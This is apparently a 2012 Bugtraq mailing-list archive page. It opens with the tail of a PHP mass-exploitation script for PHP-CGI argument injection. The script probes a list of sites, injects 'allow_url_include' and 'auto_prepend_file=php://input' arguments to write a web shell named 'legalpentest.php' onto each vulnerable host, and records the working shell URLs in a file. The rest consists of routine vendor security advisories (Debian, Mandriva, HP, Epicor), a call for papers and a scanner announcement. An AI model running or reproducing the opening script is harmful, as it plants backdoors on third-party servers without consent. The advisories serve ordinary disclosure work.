$packet .= $payload."\r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,0);
}elseif (isset($_POST['Submit']) && $list != '' && $file != '')
{
if ($port=='') {$port=80;}
for ($n =0; $n < count($list); $n++)
{
$siteAddbackup = $list[$n];
$siteAdd=str_replace("http://","",$siteAddbackup);
preg_match('/^(?:(?:http|https):\/\/)?[^\/]+(\/.+\/)[^\/\.]+\.[^\/\.]+$/i',$siteAddbackup,
$match);
$path = $match[1];
$pa = strstr(trim($siteAdd),$path);
$host=trim(str_replace($pa,"",$siteAdd));
if ($path ==''){$path = "/"; }
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;}
/* Checking
Availability */
$connection = fsockopen($host,$port);
if (!$connection)
// site is down
{
echo '<font color=red> No response from
'.htmlentities($host).' ...<br></font>';
file_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt',
$siteAddbackup."\r\n", FILE_APPEND);
}
else
// site is up
{
fclose($connection);
Exploitable($host,$path,$p);
}
}
}
Function Exploitable($host,$path,$p)
{
global $html;
$i=0;
/* Checking Exploitability */
$packet = "GET ".$p."?-s HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: PHP CGI Argument Injection Exploiter \r\n\r\n";
sendpacket($packet,1,0,0);
$str = array(
'<code><span','&lt;?');
foreach ($str as $value => $search){
if(stristr($html, $search) == TRUE)
{$i=$i+1;}}
switch($i)
{
case 0:
echo '<font color=red>'.$host.' Faild!<br></font>';
break;
case 2:
echo '<font color=#FFF8C6>'.$host.' Exploitable<br></font>';
Exploit($host,$path,$p);
}
}
Function Exploit($host,$path,$p)
{
global $html, $shell;
/* Exploiting */
$payload = "<?php \$myFile = \"legalpentest.php\"; \$filehandle =
fopen(\$myFile, 'w') or die(\"can't open file\"); \$Data=$shell;
fwrite(\$filehandle, \$Data);fclose(\$filehandle);";
$packet = "POST
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
$packet .= $payload."\r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,0);
/* Check for successfully
uploaded */
$packet = "HEAD ".$p."/legalpentest.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: :) \r\n\r\n";
sendpacket($packet,1,0,0);
if(stristr($html , '404 Not Found') == true)
{
echo '<font color=#FFF8C6><br>Exploit
Faild...<br>-------------------------------------------------------<br></font>';
}
else {
echo "<font color=#FFF8C6><br>Exploit
Succeeded...<br>http://$host$path"."/legalpentest.php<br>-------------------------------------------------------<br></font>";
file_put_contents(realpath(dirname(__FILE__)).'/shell.txt',
"http://$host$path"."/legalpentest.php\r\n", FILE_APPEND);
}
}
function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy == '')
{
$ock = fsockopen($host,$port);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo 'No response from '.htmlentities($host).' ...<br>';
stream_set_timeout($ock, 4);
}
} else
{
$parts = explode(':',$proxy);
// echo '<font color=white>Connecting to proxy:
'.$parts[0].':'.$parts[1].' ...<br><br/></font>';
$ock = fsockopen($parts[0],$parts[1]);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo 'No response from proxy...<br>';
fclose($ock);
}
}
if ($ock)
{
fputs($ock,$packet);
if ($response == 1)
{
if ($proxy == '')
{
$html = '';
while (!feof($ock))
{
$html .= fgets($ock);
}
} else
{
$html = '';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html .= fread($ock,1);
}
}
} else $html = '';
fclose($ock);
}
}
?>
</pre>admin< at >bugreport.ir2012-05-20T09:56:26[SECURITY] [DSA 2476-1] pidgin-otr security update
http://permalink.gmane.org/gmane.comp.security.bugtraq/49732
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2476-1 security< at >debian.org
http://www.debian.org/security/ Jonathan Wiltshire
May 19, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : pidgin-otr
Vulnerability : format string vulnerability
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-2369
Debian Bug : 673154
intrigeri discovered a format string error in pidgin-otr, an off-the-record
messaging plugin for Pidgin.
This could be exploited by a remote attacker to cause arbitrary code to
be executed on the user's machine.
The problem is only in pidgin-otr. Other applications which use libotr are
not affected.
For the stable distribution (squeeze), this problem has been fixed in
version 3.2.0-5+squeeze1.
For the testing distribution (wheezy), this problem has been fixed in
version 3.2.1-1.
For the unstable distribution (sid), this problem has been fixed in
version 3.2.1-1.
We recommend that you upgrade your pidgin-otr packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iQEcBAEBAgAGBQJPt/OHAAoJEL97/wQC1SS+lH0IAIunPaG8K1FkRvp/HWeqAXHG
PeWKPCgeSw6bl5Ab5zQuaZLhCT3XLYLJJq+wKm6sEaTlFstA3C7Tcf8b+n802+yP
HXueDzn+J4wYhBD6l+R8xfPYkFUqnkjMIqVYoEvpEjbCTCBUhDep/vtzOOh3ZL8y
Iz0Hgun1CL186o1p4SCNd8irLfmxUg41vOob8+XTLNKYUxDyomLk9p111f8i62wV
AWOqGJ+AEzY2Ni6ThFNJdnbm2ThFfOfgS8TK3r3331PX9+eHpfR3+cxIBGZ+3dtu
Ox7qkDd6c/Ko7cLqkiT6A/DHYZ98p1KxEDqS5eTcTwTOyL+GE7s1cJMsSApCAdw=
=gcop
-----END PGP SIGNATURE-----
</pre>Jonathan Wiltshire2012-05-19T19:30:04Call for Papers: The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012)
http://permalink.gmane.org/gmane.comp.security.bugtraq/49731
<pre>Call for Papers: The 7th International Conference for Internet
Technology and Secured Transactions (ICITST-2012)
Apologies for cross-postings.
Kindly email this call for papers to your colleagues,
faculty members and postgraduate students.
CALL FOR PAPERS
*********************************************************
Papers: The 7th International Conference for Internet Technology and
Secured Transactions (ICITST-2012)
Technical Co-Sponsored by IEEE UK/RI Computer Chapter
December 10-12, 2012, London, United Kingdom
www.icitst.org
*********************************************************
The 7th International Conference for Internet Technology and Secured
Transactions (ICITST-2012) is Technical Co-Sponsored by IEEE UK/RI
Computer Chapter.
The ICITST is an international refereed conference dedicated to the
advancement of the
theory and practical implementation of secured Internet transactions and
to fostering
discussions on information technology evolution. The ICITST aims to
provide a highly
professional and comparative academic research forum that promotes
collaborative
excellence between academia and industry. The objectives of the ICITST
are to bridge
the knowledge gap between academia and industry, promote research esteem
in secured
Internet transactions and the importance of information technology
evolution to
secured transactions. The ICITST-2012 invites research papers that
encompass
conceptual analysis, design implementation and performance evaluation.
The topics in ICITST-2012 include but are not confined to the following
areas:
1. Internet Application and Technology
Internet technologies, Internet Architecture, Internet of things,
Broadband Access Technologies,
Application Agents, Boundary Issues of Internet Security, Database
Management, Data Models for
Production Systems and Services, Artificial Intelligence and Expert
Systems, IPSec Quality of Service,
Knowledge Management, Embedded Systems, Defence Systems
2. Information Security
Collaborative Learning , Trust, Privacy and Data Security, Network
Security Issues and Protocols,
Security Challenges and Content Authoring, Cryptography, Secure
Communications, Authentication
Techniques, Chaos-based Data Security, MANET Security, Wireless Sensor
Network Security,
Organization Considerations in Security Policy Formulation and
Implementations, Digital Forensics and
Crimes, Biometrics, Cyber Security
3. Ubi/Cloud Computing
Authentication and Access Control for Data Protection in Ubi/Cloud
Computing, Context-Awareness
and its Data Mining for UbiCom, Data Grids, Distributed Information
Systems, Human-Computer
Interface and Interaction for UbiCom, Ubiquitous Systems, USN/RFID
Service, Smart Homes and its
Business Model for UbiCom Service, Security and Data Management for
UbiCom, Peer to Peer Data
Management, New Novel Mechanism and Application for Ubi/Cloud Computing
4. Infonomics and e-Technology
Infonomics, Information Visualization, Information Management,
Information Quality TechnologyEnabled
Information,e-Learning, e-Commerce, e-Business, e-Government, e-Society,
System Design and Security
for e-Services, Synchronizing e-Security
5. Multimedia and Web Services
Intelligent Multimedia and its Data Management, Multimedia Information
Systems, Multimedia
Security, Web Databases, Web Metrics and its Applications, Web Mining
including Web Intelligence
and Web 3.0., Web Services, XML and other extensible languages, Semantic
Web and Ontology
6. Cloud Security
Secure Virtual Infrastructure and Private Cloud, Cryptographic
Enforcement of Multi-Tenancy, Cloud
Requirements for PaaS and SaaS, Security Policy and Privacy
Requirements, Cloud Audit Protocol
7. Research in Progress
Ongoing research from undergraduates, graduates/postgraduates and
professionals, Collaborative
Research, Future Technologies
Submission Guidelines
The authors are invited to submit papers based on their original work
not exceeding 6 pages in length for
full papers (including all figures, tables and references). Additional
pages cost GBP £25.00 per page
with a maximum of 2 pages. We also encourage submissions of proposals
for tutorials, workshops and
special tracks. Details on the submission procedure are available at
http://www.icitst.org/Paper%20Submission.html
The extended abstract should not exceed 2 pages (including introduction,
body of knowledge and
conclusion, supported by not more than 10 references). Please submit
your extended abstract in PDF
format at extendedabstract< at >icitst.org
Important Dates
Full Paper Submission: August 01, 2012
Extended Abstract Submission: August 15, 2012
Tutorial, Workshop and Special Track Proposal Submission: August 31, 2012
Notification of Paper Acceptance: September 25, 2012
For further details, please visit www.icitst.org
</pre>Call for papers2012-05-19T08:21:20[ MDVSA-2012:079 ] sudo
http://permalink.gmane.org/gmane.comp.security.bugtraq/49730
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2012:079
http://www.mandriva.com/security/
_______________________________________________________________________
Package : sudo
Date : May 21, 2012
Affected: 2010.1, 2011., Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
A vulnerability has been found and corrected in sudo:
A flaw exists in the IP network matching code in sudo versions 1.6.9p3
through 1.8.4p4 that may result in the local host being matched
even though it is not actually part of the network described by the
IP address and associated netmask listed in the sudoers file or in
LDAP. As a result, users authorized to run commands on certain IP
networks may be able to run commands on hosts that belong to other
networks not explicitly listed in sudoers (CVE-2012-2337
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2337
http://www.sudo.ws/sudo/alerts/netmask.html
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2010.1:
10f9635c97df775aa2e84eea10cc2520 2010.1/i586/sudo-1.7.4p6-0.2mdv2010.2.i586.rpm
172ec1e9eb59daf6c619083544395615 2010.1/SRPMS/sudo-1.7.4p6-0.2mdv2010.2.src.rpm
Mandriva Linux 2010.1/X86_64:
7c223e5185387d690b1fd5c9aedbb072 2010.1/x86_64/sudo-1.7.4p6-0.2mdv2010.2.x86_64.rpm
172ec1e9eb59daf6c619083544395615 2010.1/SRPMS/sudo-1.7.4p6-0.2mdv2010.2.src.rpm
Mandriva Linux 2011:
4eaa11586daaf481506b9383462e11b1 2011/i586/sudo-1.7.6p2-1.1-mdv2011.0.i586.rpm
54e9566af0fc7a350b91a14351e83a9c 2011/SRPMS/sudo-1.7.6p2-1.1.src.rpm
Mandriva Linux 2011/X86_64:
c1a370556138f31669c713c7544ee042 2011/x86_64/sudo-1.7.6p2-1.1-mdv2011.0.x86_64.rpm
54e9566af0fc7a350b91a14351e83a9c 2011/SRPMS/sudo-1.7.6p2-1.1.src.rpm
Mandriva Enterprise Server 5:
b713c66d70635d93ccf68864c8849fe8 mes5/i586/sudo-1.7.4p6-0.2mdvmes5.2.i586.rpm
1de7c7de8f1764ecad9d727bae373fa7 mes5/SRPMS/sudo-1.7.4p6-0.2mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64:
6cabbb3df9d3ab16adb1f29b42ec24c5 mes5/x86_64/sudo-1.7.4p6-0.2mdvmes5.2.x86_64.rpm
1de7c7de8f1764ecad9d727bae373fa7 mes5/SRPMS/sudo-1.7.4p6-0.2mdvmes5.2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iD4DBQFPujn1mqjQ0CJFipgRAk+EAJ4jVLd17ksb/Ueg34F6Lfhd99OJpQCXTU5D
Bt4a74E/fTXDzhyIPE8rjw==
=wXih
-----END PGP SIGNATURE-----
</pre>security< at >mandriva.com2012-05-21T16:05:00New Open Source Web Application Vulnerability Scanner Available
http://permalink.gmane.org/gmane.comp.security.bugtraq/49726
<pre>Hi All,
There is a new web application vulnerability scanner available. It is called WebVulScan and it is open source. Here is the link for it if you want to check it out: http://code.google.com/p/webvulscan/
Regards,
Dermot Blair
</pre>webvulscan< at >gmail.com2012-05-16T23:30:29[SECURITY] [DSA 2475-1] openssl security update
http://permalink.gmane.org/gmane.comp.security.bugtraq/49725
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2475-1 security< at >debian.org
http://www.debian.org/security/ Raphael Geissert
May 17, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : openssl
Vulnerability : integer underflow
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-2333
It was discovered that openssl did not correctly handle explicit
Initialization Vectors for CBC encryption modes, as used in TLS 1.1,
1.2, and DTLS. An incorrect calculation would lead to an integer
underflow and incorrect memory access, causing denial of service
(application crash.)
For the stable distribution (squeeze), this problem has been fixed in
version 0.9.8o-4squeeze13.
For the testing distribution (wheezy), and the unstable distribution
(sid), this problem has been fixed in version 1.0.1c-1.
We recommend that you upgrade your openssl packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iEYEARECAAYFAk+1hlwACgkQYy49rUbZzlqjfACfYPRCBLE+aS8xVMrppXuPSnAi
d4gAn0gIzqCR+/YKt/2Nds2271ODpeBJ
=4mIz
-----END PGP SIGNATURE-----
</pre>Raphael Geissert2012-05-17T23:14:31[security bulletin] HPSBOV02780 SSRT100766 rev.1 - HP OpenVMS ACMELOGIN, Local Unauthorized
http://permalink.gmane.org/gmane.comp.security.bugtraq/49724
<pre>Access and Increased Privileges
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03333494
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03333494
Version: 1
HPSBOV02780 SSRT100766 rev.1 - HP OpenVMS ACMELOGIN, Local Unauthorized
Access and Increased Privileges
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2012-05-17
Last Updated: 2012-05-17
Potential Security Impact: Local unauthorized access and increased
priviileges
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with OpenVMS ACMELOGIN
when SYS$ACM system service for authentication is enabled. The vulnerability
could be locally exploited to allow unauthorized access and increased
privileges.
References: CVE-2012-2010
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenVMS Alpha v 8.3, v 8.4.
HP OpenVMS Itanium v 8.3, v 8.3-1H1, v 8.4.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-2010 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following patch kits available to resolve the vulnerability.
The patch kits and installation instructions are available from HP Support
Center (HPSC) :
To download a patch kit from HPSC :
Go to http://hp.com/go/hpsc .
Login using your HP Passport account.
Use the Search: HP Support Center at the top to search for the Patch Kit Name
from the table below.
HP OpenVMS Versions
Platform
Patch Kit Name
OpenVMS v 8.3
ALPHA
VMS83A_LOGINPLUS-V0100
OpenVMS v 8.4
ALPHA
VMS84A_LOGINPLUS-V0200
OpenVMS v 8.3
ITANIUM
VMS83I_LOGINPLUS-V0100
OpenVMS v 8.3-1H1
ITANIUM
VMS831H1I_LOGINPLUS-V0100
OpenVMS v 8.4
ITANIUM
VMS84I_LOGINPLUS-V0200
HISTORY
Version:1 (rev.1) 17 May 2012 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert< at >hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert< at >hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAk+1DYoACgkQ4B86/C0qfVn2wACg4AhiNctaAFrH5myuPZyyHb4C
g0sAn3GCFazj2OFpOgrZ6orVf9fxAnLp
=HhX8
-----END PGP SIGNATURE-----
</pre>security-alert< at >hp.com2012-05-17T22:16:06[SECURITY] [DSA 2474-1] ikiwiki security update
http://permalink.gmane.org/gmane.comp.security.bugtraq/49716
<pre>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2474-1 security< at >debian.org
http://www.debian.org/security/ Raphael Geissert
May 16, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : ikiwiki
Vulnerability : cross-site scripting
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-0220
Raúl Benencia discovered that ikiwiki, a wiki compiler, does not
properly escape the author (and its URL) of certain metadata, such as
comments. This might be used to conduct cross-site scripting attacks.
For the stable distribution (squeeze), this problem has been fixed in
version 3.20100815.9.
For the testing distribution (wheezy), this problem will be fixed soon.
For the unstable distribution (sid), this problem has been fixed in
version 3.20120516.
We recommend that you upgrade your ikiwiki packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iEYEARECAAYFAk+0iecACgkQYy49rUbZzlppyQCeMC2K6TGlP5MVOcZeENaY1QAG
gu0An1jlFHnhZrq3a+sMsfL12csrSLAA
=badx
-----END PGP SIGNATURE-----
</pre>Raphael Geissert2012-05-17T05:17:26DDIVRT-2012-44 Epicor Returns Management SOAP-Based Blind SQL Injection
http://permalink.gmane.org/gmane.comp.security.bugtraq/49715
<pre>Title
-----
DDIVRT-2012-44 Epicor Returns Management SOAP-Based Blind SQL Injection
Severity
--------
High
Date Discovered
---------------
April 12, 2012
Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Chris Graham and r< at >b13$
Vulnerability Description
-------------------------
Digital Defense, Inc. (DDI) has discovered a blind SQL injection vulnerability in the Epicor Returns Management software SOAP interface. Left unremediated, this vulnerability could be leveraged by an attacker to execute arbitrary SQL commands and extract information from the backend database using standard SQL exploitation techniques. Additionally, an attacker may be able to leverage this flaw to compromise the database server host operating system.
Solution Description
--------------------
Epicor Software Corporation has confirmed they have now contacted the customers affected, and have made an update available to address this vulnerability. As such, DDI recommends restricting access to the affected port/interface until installing the Epicor update or implementing another workaround to address the issue.
It should be noted that Epicor has advised DDI that the codebase for Returns Management software may differ significantly from customer to customer. Epicor has suggested that some customer installs may not contain this specific vulnerability as a result of this codebase variability.
DDI recommends that any customer currently utilizing Epicor Returns Management software within their enterprise install the update Epicor has made available and, if concerned about the applicability of the update, log a support call with Epicor directly to determine if their codebase contains this vulnerability.
Tested Systems / Software (with versions)
------------------------------------------
Epicor Returns Management
Windows Server 2003
Microsoft SQL Server 2000
Platform: Apache Tomcat/4.1.31
Vendor Contact
--------------
Epicor Software Corporation
www.epicor.com
</pre>ddivulnalert< at >ddifrontline.com2012-05-16T20:27:44Search EngineSearch the mailing list at Gmanequery
http://search.gmane.org/?group=$group=gmane.comp.security.bugtraq